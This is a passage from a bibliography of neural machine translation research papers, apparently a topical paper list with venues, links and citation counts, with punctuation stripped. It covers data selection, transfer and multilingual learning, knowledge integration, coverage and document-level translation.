translation training with trusted data and online data selection http aclweb org anthology w18 6314 in proceedings of the third conference on machine translation minh quang pham josep crego jean senellart and fran ois yvon 2018 fixing translation divergences in parallel corpora for neural mt http aclweb org anthology d18 1328 in proceedings of emnlp 2018 xinyi wang and graham neubig 2019 target conditioned sampling optimizing data selection for multilingual neural machine translation https arxiv org pdf 1905 08212 in proceedings of acl 2019 wei wang isaac caswell and ciprian chelba 2019 dynamically composing domain data selection with clean data selection by co curricular learning for neural machine translation https www aclweb org anthology p19 1123 in proceedings of acl 2019 dana ruiter cristina espa a bonet and josef van genabith 2019 self supervised neural machine translation https www aclweb org anthology p19 1178 in proceedings of acl 2019 xabier soto dimitar shterionov alberto poncelas and andy way 2020 selecting backtranslated data from multiple sources for improved neural machine translation http arxiv org abs 2005 00308 in proceedings of acl 2020 jiawei zhou and phillip keung 2020 improving non autoregressive neural machine translation with monolingual data https arxiv org abs 2005 00932 in proceedings of acl 2020 boliang zhang ajay nagesh and kevin knight 2020 parallel corpus filtering via pre trained language models https www aclweb org anthology 2020 acl main 756 in proceedings of acl 2020 zi yi dou antonios anastasopoulos graham neubig 2020 dynamic data selection and weighting for iterative back translation https www aclweb org anthology 2020 emnlp main 475 in proceedings of emnlp 2020 wenxiang jiao xing wang zhaopeng tu shuming shi michael r lyu irwin king 2021 self training sampling with monolingual data uncertainty for neural machine translation https aclanthology org 2021 acl long 221 pdf h4 id transfer learning transfer learning h4 barret zoph deniz yuret jonathan may and kevin knight 2016 transfer learning for low resource neural machine translation https www isi edu natural language mt emnlp16 transfer pdf in proceedings of emnlp 2016 citation https scholar google com scholar cites 10126416754494258051 as sdt 2005 sciodt 0 5 hl en 104 jiatao gu hany hassan jacob devlin and victor o k li 2018 universal neural machine translation for extremely low resource languages http aclweb org anthology n18 1032 in proceedings of naacl 2018 citation https scholar google com scholar cites 17858246967554922903 as sdt 2005 sciodt 0 5 hl en 17 tom kocmi and ond ej bojar 2018 trivial transfer learning for low resource neural machine translation http aclweb org anthology w18 6325 in proceedings of the third conference on machine translation research papers boyuan pan yazheng yang hao li zhou zhao yueting zhuang deng cai and xiaofei he 2018 macnet transferring knowledge from machine comprehension to sequence to sequence models https papers nips cc paper 7848 macnet transferring knowledge from machine comprehension to sequence to sequence models pdf in proceedings of neurips 2018 yunsu kim yingbo gao and hermann ney 2019 effective cross lingual transfer of neural machine translation models without shared vocabularies https www aclweb org anthology p19 1120 in proceedings of acl 2019 baijun ji zhirui zhang xiangyu duan min zhang boxing chen and weihua luo 2020 cross lingual pre training based transfer for zero shot neural machine translation https arxiv org abs 1912 01214 in proceedings of aaai 2020 alham fikri aji nikolay bogoychev kenneth heafield and rico sennrich 2020 in neural machine translation what does transfer learning transfer https www aclweb org anthology 2020 acl main 688 in proceedings of acl 2020 mikel artetxe gorka labaka eneko agirre 2020 translation artifacts in cross lingual transfer learning https www aclweb org anthology 2020 emnlp main 618 in proceedings of emnlp 2020 h4 id meta learning meta learning h4 jiatao gu yong wang yun chen kyunghyun cho and victor o k li 2018 meta learning for low resource neural machine translation http aclweb org anthology d18 1398 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 15276484097983678999 as sdt 2005 sciodt 0 5 hl en 3 rumeng li xun wang and hong yu 2020 metamt a metalearning method leveraging multiple domain data for low resource machine translation https arxiv org abs 1912 05467 in proceedings of aaai 2020 h3 id multilingual multilingual machine translation h3 daxiang dong hua wu wei he dianhai yu and haifeng wang 2015 multi task learning for multiple language translation http aclweb org anthology p15 1166 in proceedings of acl 2015 citation https scholar google com scholar um 1 ie utf 8 lr cites 6980356795259585193 126 orhan firat kyunghyun cho and yoshua bengio 2016 multi way multilingual neural machine translation with a shared attention mechanism https arxiv org pdf 1601 01073 pdf in proceedings of naacl 2016 citation https scholar google com scholar cites 1297298716616390295 as sdt 2005 sciodt 0 5 hl en 146 barret zoph and kevin knight 2016 multi source neural translation https arxiv org pdf 1601 00710 pdf in proceedings of naacl 2016 citation https scholar google com scholar cites 9798500345837394101 as sdt 2005 sciodt 0 5 hl en 87 orhan firat baskaran sankaran yaser al onaizan fatos t yarman vural kyunghyun cho 2016 zero resource translation with multi lingual neural machine translation https arxiv org pdf 1606 04164 pdf in proceedings of emnlp 2016 citation https scholar google com scholar cites 9699063558012530354 as sdt 2005 sciodt 0 5 hl en 50 melvin johnson mike schuster quoc v le maxim krikun yonghui wu zhifeng chen nikhil thorat fernanda vi gas martin wattenberg greg corrado macduff hughes and jeffrey dean 2017 google s multilingual neural machine translation system enabling zero shot translation https arxiv org pdf 1611 04558 transactions of the association for computational linguistics citation https scholar google com scholar cites 12207392403413415154 as sdt 2005 sciodt 0 5 hl en 297 poorya zaremoodi and gholamreza haffari 2018 neural machine translation for bilingually scarce scenarios a deep multi task learning approach http aclweb org anthology n18 1123 in proceedings of naacl 2018 citation https scholar google com scholar cites 2302112873809678173 as sdt 2005 sciodt 0 5 hl en 1 poorya zaremoodi wray buntine and gholamreza haffari 2018 adaptive knowledge sharing in multi task learning improving low resource neural machine translation http aclweb org anthology p18 2104 in proceedings of acl 2018 surafel melaku lakew mauro cettolo and marcello federico 2018 a comparison of transformer and recurrent neural networks on multilingual neural machine translation http aclweb org anthology c18 1054 in proceedings of coling 2018 citation https scholar google com scholar cites 3404592318370335271 as sdt 2005 sciodt 0 5 hl en 2 graeme blackwood miguel ballesteros and todd ward 2018 multilingual neural machine translation with task specific attention http aclweb org anthology c18 1263 in proceedings of coling 2018 citation https scholar google com scholar cites 2095693945870319009 as sdt 2005 sciodt 0 5 hl en 1 devendra singh sachan and graham neubig 2018 parameter sharing methods for multilingual self attentional translation models http aclweb org anthology w18 6327 in proceedings of the third conference on machine translation research papers emmanouil antonios platanios mrinmaya sachan graham neubig and tom mitchell 2018 contextual parameter generation for universal neural machine translation http aclweb org anthology d18 1039 in proceedings of emnlp 2018 yining wang jiajun zhang feifei zhai jingfang xu and chengqing zong 2018 three strategies to improve one to many multilingual translation http aclweb org anthology d18 1326 in proceedings of emnlp 2018 xu tan yi ren di he tao qin zhou zhao and tie yan liu 2019 multilingual neural machine translation with knowledge distillation https openreview net pdf id s1gusor9yx in proceedings of iclr 2019 xinyi wang hieu pham philip arthur and graham neubig 2019 multilingual neural machine translation with soft decoupled encoding https openreview net pdf id skeke3c5fm in proceedings of iclr 2019 maruan al shedivat and ankur p parikh 2019 consistency by agreement in zero shot neural machine translation https arxiv org pdf 1904 02338 pdf in proceedings of naacl 2019 roee aharoni melvin johnson and orhan firat 2019 massively multilingual neural machine translation https arxiv org pdf 1903 00089 pdf in proceedings of naacl 2019 yunsu kim yingbo gao and hermann ney 2019 effective cross lingual transfer of neural machine translation models without shared vocabularies https arxiv org pdf 1905 05475 in proceedings of acl 2019 carlos escolano marta r costa juss and jos a r fonollosa 2019 from bilingual to multilingual neural machine translation by incremental training https arxiv org pdf 1907 00735 in proceedings of acl 2019 yining wang long zhou jiajun zhang feifei zhai jingfang xu and chengqing zong 2019 a compact and language sensitive multilingual translation method https www aclweb org anthology p19 1117 in proceedings of acl 2019 sukanta sen kamal kumar gupta asif ekbal and pushpak bhattacharyya 2019 multilingual unsupervised nmt using shared encoder and language specific decoders https www aclweb org anthology p19 1297 in proceedings of acl 2019 xu tan jiale chen di he yingce xia tao qin and tie yan liu 2019 multilingual neural machine translation with language clustering https arxiv org pdf 1908 09324 in proceedings of emnlp 2019 sneha reddy kudugunta ankur bapna isaac caswell naveen arivazhagan and orhan firat 2019 investigating multilingual nmt representations at scale https arxiv org pdf 1909 02197 in proceedings of emnlp 2019 ankur bapna naveen arivazhagan and orhan firat 2019 simple scalable adaptation for neural machine translation https arxiv org pdf 1909 08478 in proceedings of emnlp 2019 raj dabre atsushi fujita and chenhui chu 2019 low resource neural machine translation by exploiting multilingualism through multi step fine tuning using n way parallel corpora https www aclweb org anthology d19 1146 in proceedings of emnlp 2019 xinyi wang yulia tsvetkov and graham neubig 2020 balancing training for multilingual neural machine translation https arxiv org abs 2004 06748 in proceedings of acl 2020 biao zhang philip williams ivan titov and rico sennrich 2020 improving massively multilingual neural machine translation and zero shot translation https arxiv org abs 2004 11867 in proceedings of acl 2020 haipeng sun rui wang kehai chen masao utiyama eiichiro sumita and tiejun zhao 2020 knowledge distillation for multilingual unsupervised neural machine translation https arxiv org abs 2004 10171 in proceedings of acl 2020 aditya siddhant ankur bapna yuan cao orhan firat mia chen sneha kudugunta naveen arivazhagan and yonghui wu 2020 leveraging monolingual data with self supervision for multilingual neural machine translation https arxiv org abs 2005 04816 in proceedings of acl 2020 changfeng zhu heng yu shanbo cheng and weihua luo 2020 language aware interlingua for multilingual neural machine translation https www aclweb org anthology 2020 acl main 150 in proceedings of acl 2020 zehui lin xiao pan mingxuan wang xipeng qiu jiangtao feng hao zhou lei li 2020 pre training multilingual neural machine translation by leveraging alignment information https www aclweb org anthology 2020 emnlp main 210 in proceedings of emnlp 2020 sungwon lyu bokyung son kichang yang jaekyoung bae 2020 revisiting modularized multilingual nmt to meet industrial demands https www aclweb org anthology 2020 emnlp main 476 in proceedings of emnlp 2020 arturo oncevay barry haddow alexandra birch 2020 bridging linguistic typology and multilingual machine translation with multi view language representations https www aclweb org anthology 2020 emnlp main 187 in proceedings of emnlp 2020 yiren wang chengxiang zhai hany hassan 2020 multi task learning for multilingual neural machine translation https www aclweb org anthology 2020 emnlp main 75 in proceedings of emnlp 2020 raj dabre chenhui chu anoop kunchukuttan 2020 a comprehensive survey of multilingual neural machine translation https arxiv org abs 2001 01115 arxiv 2001 01115 biao zhang ankur bapna rico sennrich orhan firat 2021 share or not learning to schedule language specific capacity for multilingual translation https openreview net pdf id wj4odo0uycf in proceedings of iclr 2021 h3 id prior knowledge integration prior knowledge integration h3 h4 id word phrase constraints word phrase constraints h4 wei he zhongjun he hua wu and haifeng wang 2016 improved nerual machine translation with smt features https www aaai org ocs index php aaai aaai16 paper view 12189 11577 in proceedings of aaai 2016 citation https scholar google com scholar cites 11596393526530282899 as sdt 2005 sciodt 0 5 hl en 46 haitao mi zhiguo wang and abe ittycheriah 2016 vocabulary manipulation for neural machine translation http anthology aclweb org p16 2021 in proceedings of acl 2016 citation https scholar google com scholar cites 10504291626587983597 as sdt 2005 sciodt 0 5 hl en 36 philip arthur graham neubig and satoshi nakamura 2016 incorporating discrete translation lexicons into neural machine translation http aclweb org anthology d16 1162 in proceedings of emnlp 2016 citation https scholar google com scholar cites 3629816068189607565 as sdt 2005 sciodt 0 5 hl en 55 xing wang zhengdong lu zhaopeng tu hang li deyi xiong min zhang 2017 neural machine translation advised by statistical machine translation https www aaai org ocs index php aaai aaai17 paper viewpaper 14451 in proceedings of aaai 2016 citation https scholar google com scholar cites 9788492799819599206 as sdt 2005 sciodt 0 5 hl en 34 jiacheng zhang yang liu huanbo luan jingfang xu and maosong sun 2017 prior knowledge integration for neural machine translation using posterior regularization http aclweb org anthology p17 1139 in proceedings of acl 2017 citation https scholar google com scholar cites 16820322563543305280 as sdt 2005 sciodt 0 5 hl en 13 chris hokamp and qun liu 2017 lexically constrained decoding for sequence generation using grid beam search http aclweb org anthology p17 1141 in proceedings of acl 2017 citation https scholar google com scholar cites 3629816068189607565 as sdt 2005 sciodt 0 5 hl en 19 zichao yang zhiting hu yuntian deng chris dyer and alex smola 2017 neural machine translation with recurrent attention modeling http aclweb org anthology e17 2061 in proceedings of eacl 2017 citation https scholar google com scholar cites 5621977008323303060 as sdt 2005 sciodt 0 5 hl en 25 ofir press and lior wolf 2017 using the output embedding to improve language models http aclweb org anthology e17 2025 in proceedings of eacl 2017 citation https scholar google com scholar cites 3142797974561089298 as sdt 2005 sciodt 0 5 hl en 127 rajen chatterjee matteo negri marco turchi marcello federico lucia specia and fr d ric blain 2017 guiding neural machine translation decoding with external knowledge http aclweb org anthology w17 4716 in proceedings of the second conference on machine translation citation https scholar google com scholar cites 16027327382881304751 as sdt 2005 sciodt 0 5 hl en 8 rongxiang weng shujian huang zaixiang zheng xinyu dai and jiajun chen 2017 neural machine translation with word predictions http aclweb org anthology d17 1013 in proceedings of emnlp 2017 citation https scholar google com scholar cites 9033034245087042151 as sdt 2005 sciodt 0 5 hl en 8 yang feng shiyue zhang andi zhang dong wang and andrew abel 2017 memory augmented neural machine translation http aclweb org anthology d17 1146 in proceedings of emnlp 2017 citation https scholar google com scholar cites 825727884820810695 as sdt 2005 sciodt 0 5 hl en 9 leonard dahlmann evgeny matusov pavel petrushkov and shahram khadivi 2017 neural machine translation leveraging phrase based models in a hybrid search http aclweb org anthology d17 1148 in proceedings of emnlp 2017 citation https scholar google com scholar cites 4507716603851611885 as sdt 2005 sciodt 0 5 hl en 11 xing wang zhaopeng tu deyi xiong and min zhang 2017 translating phrases in neural machine translation http aclweb org anthology d17 1149 in proceedings of emnlp 2017 citation https scholar google com scholar cites 13251445351500921697 as sdt 2005 sciodt 0 5 hl en 15 baosong yang derek f wong tong xiao lidia s chao and jingbo zhu 2017 towards bidirectional hierarchical representations for attention based neural machine translation http aclweb org anthology d17 1150 in proceedings of emnlp 2017 citation https scholar google com scholar cites 18313642653606285813 as sdt 2005 sciodt 0 5 hl en 5 po sen huang chong wang sitao huang dengyong zhou and li deng 2018 towards neural phrase based machine translation https openreview net pdf id hktjec1rz in proceedings of iclr 2018 citation https scholar google com scholar cites 14839462711165509564 as sdt 2005 sciodt 0 5 hl en 15 toan nguyen and david chiang 2018 improving lexical choice in neural machine translation http aclweb org anthology n18 1031 in proceedings of naacl 2018 citation https scholar google com scholar cites 8911122350121698073 as sdt 2005 sciodt 0 5 hl en 8 huadong chen shujian huang david chiang xinyu dai and jiajun chen 2018 combining character and word information in neural machine translation using a multi level attention http aclweb org anthology n18 1116 in proceedings of naacl 2018 matt post and david vilar 2018 fast lexically constrained decoding with dynamic beam allocation for neural machine translation http aclweb org anthology n18 1119 in proceedings of naacl 2018 citation https scholar google com scholar cites 3504623917475500888 as sdt 2005 sciodt 0 5 hl en 6 jingyi zhang masao utiyama eiichro sumita graham neubig and satoshi nakamura 2018 guiding neural machine translation with retrieved translation pieces http aclweb org anthology n18 1120 in proceedings of naacl 2018 citation https scholar google com scholar cites 9376584188557423045 as sdt 2005 sciodt 0 5 hl en 2 eva hasler adri de gispert gonzalo iglesias and bill byrne 2018 neural machine translation decoding with terminology constraints http aclweb org anthology n18 2081 in proceedings of naacl 2018 citation https scholar google com scholar cites 17574582694557390759 as sdt 2005 sciodt 0 5 hl en 2 nima pourdamghani marjan ghazvininejad and kevin knight 2018 using word vectors to improve word alignments for low resource machine translation http aclweb org anthology n18 2083 in proceedings of naacl 2018 citation https scholar google com scholar cites 936856152380506206 as sdt 2005 sciodt 0 5 hl en 2 shuming ma xu sun yizhong wang and junyang lin 2018 bag of words as target for neural machine translation http aclweb org anthology p18 2053 in proceedings of acl 2018 citation https scholar google com scholar cites 4656961594972480096 as sdt 2005 sciodt 0 5 hl en 10 mingxuan wang jun xie zhixing tan jinsong su deyi xiong and chao bian 2018 neural machine translation with decoding history enhanced attention http aclweb org anthology c18 1124 in proceedings of coling 2018 arata ugawa akihiro tamura takashi ninomiya hiroya takamura and manabu okumura 2018 neural machine translation incorporating named entity http aclweb org anthology c18 1274 in proceedings of coling 2018 longyue wang zhaopeng tu andy way and qun liu 2018 learning to jointly translate and predict dropped pronouns with a shared reconstruction mechanism http aclweb org anthology d18 1333 in proceedings of emnlp 2018 citation https scholar google com scholar cites 7240636423092684747 as sdt 2005 sciodt 0 5 hl en 1 qian cao and deyi xiong 2018 encoding gated translation memory into neural machine translation http aclweb org anthology d18 1340 in proceedings of emnlp 2018 chengyue gong di he xu tan tao qin liwei wang and tie yan liu 2018 frage frequency agnostic word representation https arxiv org pdf 1809 06858 in proceedings of neurips 2018 citation https scholar google com scholar cites 899516517229807927 as sdt 2005 sciodt 0 5 hl en 2 inigo jauregi unanue ehsan zare borzeshi nazanin esmaili and massimo piccardi rewe regressing word embeddings for regularization of neural machine translation systems https arxiv org pdf 1904 02461 pdf in proceedings of naacl 2019 kai song yue zhang heng yu weihua luo kun wang and min zhang 2019 code switching for enhancing nmt with pre specified translation https www aclweb org anthology n19 1044 in proceedings of naacl 2019 xuebo liu derek f wong yang liu lidia s chao tong xiao and jingbo zhu 2019 shared private bilingual word embeddings for neural machine translation https arxiv org pdf 1906 03100 in proceedings of acl 2019 georgiana dinu prashant mathur marcello federico and yaser al onaizan 2019 training neural machine translation to apply terminology constraints https www aclweb org anthology p19 1294 in proceedings of acl 2019 longyue wang zhaopeng tu xing wang and shuming shi 2019 one model to learn both zero pronoun prediction and translation https www aclweb org anthology d19 1085 pdf in proceedings of emnlp 2019 jinhua zhu yingce xia lijun wu di he tao qin wengang zhou houqiang li tieyan liu 2020 incorporating bert into neural machine translation https openreview net forum id hyl7ygstwb in proceedings of iclr 2020 hongfei xu josef van genabith deyi xiong qiuhui liu and jingyi zhang 2020 learning source phrase representations for neural machine translation https www aclweb org anthology 2020 acl main 37 in proceedings of acl 2020 raymond hendy susanto shamil chollampatt and liling tan 2020 lexically constrained neural machine translation with levenshtein transformer https arxiv org abs 2004 12681 in proceedings of acl 2020 thomas zenkel joern wuebker and john denero 2020 end to end neural word alignment outperforms giza https www aclweb org anthology 2020 acl main 146 in proceedings of acl 2020 liang ding longyue wang and dacheng tao 2020 self attention with cross lingual position representation https www aclweb org anthology 2020 acl main 153 in proceedings of acl 2020 marion weller di marco and alexander fraser 2020 modeling word formation in english german neural machine translation https www aclweb org anthology 2020 acl main 389 in proceedings of acl 2020 yun chen yang liu guanhua chen xin jiang qun liu 2020 accurate word alignment induction from neural machine translation https www aclweb org anthology 2020 emnlp main 42 in proceedings of emnlp 2020 prathyusha jwalapuram shafiq joty youlin shen 2020 pronoun targeted fine tuning for nmt with hybrid losses https www aclweb org anthology 2020 emnlp main 177 in proceedings of emnlp 2020 jingyi zhang josef van genabith a bidirectional transformer based alignment model for unsupervised word alignment https aclanthology org 2021 acl long 24 pdf in proceedings of acl 2021 h4 id syntactic semantic constraints syntactic semantic constraints h4 trevor cohn cong duy vu hoang ekaterina vymolova kaisheng yao chris dyer and gholamreza haffari 2016 incorporating structural alignment biases into an attentional neural translation model https arxiv org pdf 1601 01085 pdf in proceedings of naacl 2016 citation https scholar google com hk scholar cites 6876101136632328854 as sdt 2005 sciodt 0 5 hl en 80 yong cheng shiqi shen zhongjun he wei he hua wu maosong sun and yang liu 2016 agreement based joint training for bidirectional attention based neural machine translation http nlp csai tsinghua edu cn ly papers ijcai16 agree pdf in proceedings of ijcai 2016 citation https scholar google com hk scholar cites 7726998929707665947 as sdt 2005 sciodt 0 5 hl en 26 akiko eriguchi kazuma hashimoto and yoshimasa tsuruoka 2016 tree to sequence attentional neural machine translation http aclweb org anthology p16 1078 in proceedings of acl 2016 citation https scholar google com hk scholar cites 10114639659174243367 as sdt 2005 sciodt 0 5 hl en 79 felix stahlberg eva hasler aurelien waite and bill byrne 2016 syntactically guided neural machine translation http anthology aclweb org p16 2049 in proceedings of acl 2016 citation https scholar google com scholar um 1 ie utf 8 lr cites 11012034683105038430 32 xing shi inkit padhi and kevin knight 2016 does string based neural mt learn source syntax http aclweb org anthology d16 1159 in proceedings of the emnlp 2016 citation https scholar google com scholar oi bibs hl en cites 13782051589621719871 57 junhui li deyi xiong zhaopeng tu muhua zhu min zhang and guodong zhou 2017 modeling source syntax for neural machine translation http aclweb org anthology p17 1064 in proceedings of acl 2017 citation https scholar google com hk scholar cites 4418568278013664001 as sdt 2005 sciodt 0 5 hl en 30 shuangzhi wu dongdong zhang nan yang mu li and ming zhou 2017 sequence to dependency neural machine translation http aclweb org anthology p17 1065 in proceedings of acl 2017 citation https scholar google com hk scholar cites 13183481097489234938 as sdt 2005 sciodt 0 5 hl en 19 jinchao zhang mingxuan wang qun liu and jie zhou 2017 incorporating word reordering knowledge into attention based neural machine translation http aclweb org anthology p17 1140 in proceedings of acl 2017 citation https scholar google com hk scholar cites 9939097556529491198 as sdt 2005 sciodt 0 5 hl en 8 huadong chen shujian huang david chiang and jiajun chen 2017 improved neural machine translation with a syntax aware encoder and decoder http aclweb org anthology p17 1177 in proceedings of acl 2017 citation https scholar google com hk scholar cites 17162498190462264248 as sdt 2005 sciodt 0 5 hl en 32 akiko eriguchi yoshimasa tsuruoka and kyunghyun cho 2017 learning to parse and translate improves neural machine translation http aclweb org anthology p17 2012 in proceedings of acl 2017 citation https scholar google com hk scholar cites 17499695818526131085 as sdt 2005 sciodt 0 5 hl en 29 roee aharoni and yoav goldberg 2017 towards string to tree neural machine translation http aclweb org anthology p17 2021 in proceedings of acl 2017 citation https scholar google com hk scholar cites 13743835036381505969 as sdt 2005 sciodt 0 5 hl en 45 kazuma hashimoto and yoshimasa tsuruoka 2017 neural machine translation with source side latent graph parsing http aclweb org anthology d17 1012 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 2595733316497621779 as sdt 2005 sciodt 0 5 hl en 9 joost bastings ivan titov wilker aziz diego marcheggiani and khalil simaan 2017 graph convolutional encoders for syntax aware neural machine translation http aclweb org anthology d17 1209 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 4876389727678322394 as sdt 2005 sciodt 0 5 hl en 31 kehai chen rui wang masao utiyama lemao liu akihiro tamura eiichiro sumita and tiejun zhao 2017 neural machine translation with source dependency representation http aclweb org anthology d17 1304 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 3839215870693368887 as sdt 2005 sciodt 0 5 hl en 7 peyman passban qun liu and andy way 2018 improving character based decoding using target side morphological information for neural machine translation http aclweb org anthology n18 1006 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 13968879243228181963 as sdt 2005 sciodt 0 5 hl en 5 diego marcheggiani joost bastings and ivan titov 2018 exploiting semantics in neural machine translation with graph convolutional networks http aclweb org anthology n18 2078 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 9319609055086898131 as sdt 2005 sciodt 0 5 hl en 7 chunpeng ma akihiro tamura masao utiyama tiejun zhao and eiichiro sumita 2018 forest based neural machine translation http aclweb org anthology p18 1116 in proceedings of acl 2018 citation https scholar google com hk scholar cites 8184521634220071433 as sdt 2005 sciodt 0 5 hl en 1 shaohui kuang junhui li ant nio branco weihua luo and deyi xiong 2018 attention focusing for neural machine translation by bridging source and target embeddings http aclweb org anthology p18 1164 in proceedings of acl 2018 citation https scholar google com hk scholar cites 13357719581808108940 as sdt 2005 sciodt 0 5 hl en 1 duygu ataman and marcello federico 2018 compositional representation of morphologically rich input for neural machine translation http aclweb org anthology p18 2049 in proceedings of acl 2018 citation https scholar google com hk scholar cites 12939556873639208603 as sdt 2005 sciodt 0 5 hl en 4 daniel beck gholamreza haffari and trevor cohn 2018 graph to sequence learning using gated graph neural networks http aclweb org anthology p18 1026 in proceedings of acl 2018 citation https scholar google com au scholar cites 12197496840503693067 as sdt 2005 sciodt 0 5 hl en 3 danielle saunders felix stahlberg adri de gispert and bill byrne 2018 multi representation ensembles and delayed sgd updates improve syntax based nmt http aclweb org anthology p18 2051 in proceedings of acl 2018 wen zhang jiawei hu yang feng and qun liu 2018 refining source representations with relation networks for neural machine translation http aclweb org anthology c18 1110 in proceedings of coling 2018 poorya zaremoodi and gholamreza haffari 2018 incorporating syntactic uncertainty in neural machine translation with a forest to sequence model http aclweb org anthology c18 1120 in proceedings of coling 2018 hao zhang axel ng and richard sproat 2018 fast and accurate reordering with itg transition rnn http aclweb org anthology c18 1123 in proceedings of coling 2018 jetic g hassan s shavarani and anoop sarkar 2018 top down tree structured decoding with syntactic connections for neural machine translation and parsing http aclweb org anthology d18 1037 in proceedings of emnlp 2018 anna currey and kenneth heafield 2018 multi source syntactic neural machine translation http aclweb org anthology d18 1327 in proceedings of emnlp 2018 xinyi wang hieu pham pengcheng yin and graham neubig 2018 a tree based decoder for neural machine translation http aclweb org anthology d18 1509 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 9083843868999368969 as sdt 2005 sciodt 0 5 hl en 1 eliyahu kiperwasser and miguel ballesteros 2018 scheduled multi task learning from syntax to translation http aclweb org anthology q18 1017 transactions of the association for computational linguistics citation https scholar google com hk scholar cites 7224616032403591303 as sdt 2005 sciodt 0 5 hl en 4 xiao pu nikolaos pappas james henderson and andrei popescu belis 2018 integrating weakly supervised word sense disambiguation into neural machine translation https www aclweb org anthology q18 1044 transactions of the association for computational linguistics kai song yue zhang min zhang and weihua luo 2018 improved english to russian translation by neural suffix prediction https arxiv org pdf 1801 03615 in proceedings of aaai 2018 rudra murthy v anoop kunchukuttan and pushpak bhattacharyya 2019 addressing word order divergence in multilingual neural machine translation for extremely low resource languages https arxiv org pdf 1811 00383 pdf in proceedings of naacl 2019 meishan zhang zhenghua li guohong fu and min zhang 2019 syntax enhanced neural machine translation with syntax aware word representations https arxiv org pdf 1905 02878 in proceedings of naacl 2019 linfeng song daniel gildea yue zhang zhiguo wang and jinsong su 2019 semantic neural machine translation using amr https www aclweb org anthology q19 1002 transactions of the association for computational linguistics nader akoury kalpesh krishna and mohit iyyer 2019 syntactically supervised transformers for faster neural machine translation https arxiv org pdf 1906 02780 in proceedings of acl 2019 zhijiang guo yan zhang zhiyang teng and wei lu 2019 densely connected graph convolutional networks for graph to sequence learning https www mitpressjournals org doi pdf 10 1162 tacl a 00269 transactions of the association for computational linguistics xuewen yang yingru liu dongliang xie xin wang and niranjan balasubramanian 2019 latent part of speech sequences for neural machine translation https arxiv org pdf 1908 11782 in proceedings of emnlp 2019 jie hao xing wang shuming shi jinfeng zhang and zhaopeng tu 2019 multi granularity self attention for neural machine translation https arxiv org pdf 1909 02222 in proceedings of emnlp 2019 jie hao xing wang shuming shi jinfeng zhang and zhaopeng tu 2019 towards better modeling hierarchical structure for self attention with ordered neurons https arxiv org pdf 1909 01562 in proceedings of emnlp 2019 kayyen wong sameen maruf and gholamreza haffari 2020 contextual neural machine translation improves translation of cataphoric pronouns https arxiv org abs 2004 09894 in proceedings of acl 2020 emanuele bugliarello and naoaki okazaki 2020 enhancing machine translation with dependency aware self attention http arxiv org abs 1909 03149 in proceedings of acl 2020 kehai chen rui wang masao utiyama and eiichiro sumita 2020 content word aware neural machine translation https www aclweb org anthology 2020 acl main 34 in proceedings of acl 2020 jian yang shuming ma dongdong zhang zhoujun li and ming zhou 2020 improving neural machine translation with soft template prediction https www aclweb org anthology 2020 acl main 531 in proceedings of acl 2020 r thomas mccoy robert frank and tal linzen 2020 does syntax need to grow on trees sources of hierarchical inductive bias in sequence to sequence networks https transacl org ojs index php tacl article view 1892 transactions of the association for computational linguistics h4 id coverage constraints coverage constraints h4 zhaopeng tu zhengdong lu yang liu xiaohua liu and hang li 2016 modeling coverage for neural machine translation http aclweb org anthology p16 1008 in proceedings of acl 2016 citation https scholar google com hk scholar cites 894656013823838967 as sdt 2005 sciodt 0 5 hl en 236 haitao mi baskaran sankaran zhiguo wang and abe ittycheriah 2016 coverage embedding models for neural machine translation http aclweb org anthology d16 1096 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 10478809182142146899 as sdt 2005 sciodt 0 5 hl en 59 zhaopeng tu yang liu zhengdong lu xiaohua liu and hang li 2017 context gates for neural machine translation http aclweb org anthology q17 1007 transactions of the association for computational linguistics citation https scholar google com scholar cites 4217513324479200768 as sdt 2005 sciodt 0 5 hl en 36 yanyang li tong xiao yinqiao li qiang wang changming xu and jingbo zhu 2018 a simple and effective approach to coverage aware neural machine translation http aclweb org anthology p18 2047 in proceedings of acl 2018 citation https scholar google com hk scholar cites 9588245142858602659 as sdt 2005 sciodt 0 5 hl en 1 zaixiang zheng hao zhou shujian huang lili mou xinyu dai jiajun chen and zhaopeng tu 2018 modeling past and future for neural machine translation https aclanthology coli uni saarland de events tacl 2018 transactions of the association for computational linguistics citation https scholar google com hk scholar cites 3361428233702531610 as sdt 2005 sciodt 0 5 hl en 10 xiang kong zhaopeng tu shuming shi eduard hovy and tong zhang neural machine translation with adequacy oriented learning https arxiv org pdf 1811 08541 pdf in proceedings of aaai 2019 zaixiang zheng shujian huang zhaopeng tu xin yu dai and jiajun chen 2019 dynamic past and future for neural machine translation https www aclweb org anthology d19 1086 in proceedings of emnlp 2019 h3 id document level translation document level translation h3 longyue wang zhaopeng tu andy way and qun liu 2017 exploiting cross sentence context for neural machine translation http aclweb org anthology d17 1301 in proceedings of emnlp 2017 citation https scholar google com scholar cites 7614033458131200423 as sdt 2005 sciodt 0 5 hl en 19 j rg tiedemann and yves scherrer 2017 neural machine translation with extended context http www aclweb org anthology w17 4811 in proceedings of the third workshop on discourse in machine translation citation https scholar google com scholar um 1 ie utf 8 lr cites 16950693252825831302 12 rachel bawden rico sennrich alexandra birch and barry haddow 2018 evaluating discourse phenomena in neural machine translation http aclweb org anthology n18 1118 in proceedings of naacl 2018 citation https scholar google com scholar cites 1436848483757205177 as sdt 2005 sciodt 0 5 hl en 11 elena voita pavel serdyukov rico sennrich and ivan titov 2018 context aware neural machine translation learns anaphora resolution http aclweb org anthology p18 1117 in proceedings of acl 2018 citation https scholar google com scholar cites 16594777811418303416 as sdt 2005 sciodt 0 5 hl en 7 sameen maruf and gholamreza haffari 2018 document context neural machine translation with memory networks http aclweb org anthology p18 1118 in proceedings of acl 2018 citation https scholar google com scholar cites 17337605639464710308 as sdt 2005 sciodt 0 5 hl en 5 shaohui kuang deyi xiong weihua luo guodong zhou 2018 modeling coherence for neural machine translation with dynamic and topic caches http aclweb org anthology c18 1050 in proceedings of coling 2018 citation https scholar google com scholar cites 12991114209233735355 as sdt 2005 sciodt 0 5 hl en 1 shaohui kuang and deyi xiong 2018 fusing recency into neural machine translation with an inter sentence gate model https arxiv org pdf 1806 04466 pdf in proceedings of coling 2018 jiacheng zhang huanbo luan maosong sun feifei zhai jingfang xu min zhang and yang liu 2018 improving the transformer translation model 